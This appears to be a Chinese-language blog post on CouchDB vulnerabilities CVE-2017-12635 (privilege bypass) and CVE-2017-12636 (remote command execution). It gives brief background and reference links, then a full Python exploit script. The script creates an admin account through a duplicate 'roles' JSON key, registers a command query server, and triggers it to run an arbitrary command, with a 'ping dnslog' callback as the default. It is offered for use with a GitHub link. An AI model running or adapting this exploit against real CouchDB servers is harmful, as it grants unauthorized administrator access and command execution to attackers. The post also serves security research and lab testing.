COUCHDB_EXP

couchdb介绍：

CouchDB是用Erlang开发的面向文档的数据库系统。CouchDB不是一个传统的关系数据库，而是面向文档的数据库，其数据存储方式有点类似lucene的index文件格式，CouchDB最大的意义在于它是一个面向web应用的新一代存储系统。

爆出的是两个漏洞

CVE-2017-12635 垂直权限绕过
CVE-2017-12636 远程命令执行

影响版本：

小于 1.7.0 以及 小于 2.1.1

version1：

version2：

漏洞详情：

已经有很多文章解释了漏洞的成因，这里就不再重复了，给出链接地址：

参考链接：https://justi.cz/security/2017/11/14/couchdb-rce-npm.html

poc验证：https://www.secpulse.com/archives/45917.html

成因分析：https://www.anquanke.com/post/id/87256

p牛已经给出了漏洞演示地址：

这里给出docker-compose

CVE-2017-12636 远程命令执行需要管理员权限，利用CVE-2017-12635 垂直权限绕过直接增加用户即可

自己根据poc改了个exp:

# coding=utf-8
#!/usr/bin/python
# Author: haya

import sys
import json
import requests
from urllib.request import Request, urlopen
from requests.auth import HTTPBasicAuth


def get_version(url):
    response = requests.get(url)
    db_version = json.loads(response.text)
    return int(db_version['version'][0:1])


def add_user(ip):
    url = r'/_users/org.couchdb.user:wooyun'
    headers = {
        'User-Agent': 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)',
        'Content-Type': 'application/json',
        }

    data = b"""
        {
          "type": "user",
          "name": "wooyun",
          "roles": ["_admin"],
          "roles":[],
          "password": "wooyun"
        }
        """
    full_url = ip + url
    try:
        res = Request(url=full_url, headers=headers, data=data, method='PUT')
        html = urlopen(res).read()
        # print(html)
        print("Maybe user add success!")
    except:
        print('Have a error!The user add failure!')
        print('Maybe the user is exist!')


def cme_exec(target, command, version):
    session = requests.session()
    session.headers = {
        'Content-Type': 'application/json'
    }
    session.put(target + '/_users/org.couchdb.user:wooyun', data='''{
      "type": "user",
      "name": "wooyun",
      "roles": ["_admin"],
      "roles": [],
      "password": "wooyun"
    }''')
    session.auth = HTTPBasicAuth('wooyun', 'wooyun')
    if version == 1:
        session.put(target + ('/_config/query_servers/cmd'), data=command)
    else:
        try:
            host = session.get(target + '/_membership').json()['all_nodes'][0]
            session.put(target + '/_node/{}/_config/query_servers/cmd'.format(host), data=command)
        except:
            print('The target faild')

    session.put(target + '/wooyun')
    session.put(target + '/wooyun/test', data='{"_id": "wooyuntest"}')

    if version == 1:
        session.post(target + '/wooyun/_temp_view?limit=10', data='{"language":"cmd","map":""}')
    else:
        session.put(target + '/wooyun/_design/test', data='{"_id":"_design/test","views":{"wooyun":{"map":""} },"language":"cmd"}')


def main():
    target = sys.argv[1]
    command = '"ping dnslog"'
    version = get_version(target)
    add_user(target)
    cme_exec(target, command, version)

if __name__ == '__main__':
    main()

 

github地址：https://github.com/hayasec/couchdb_exp

鸣谢：phith0n@vulhub p牛膜拜一波。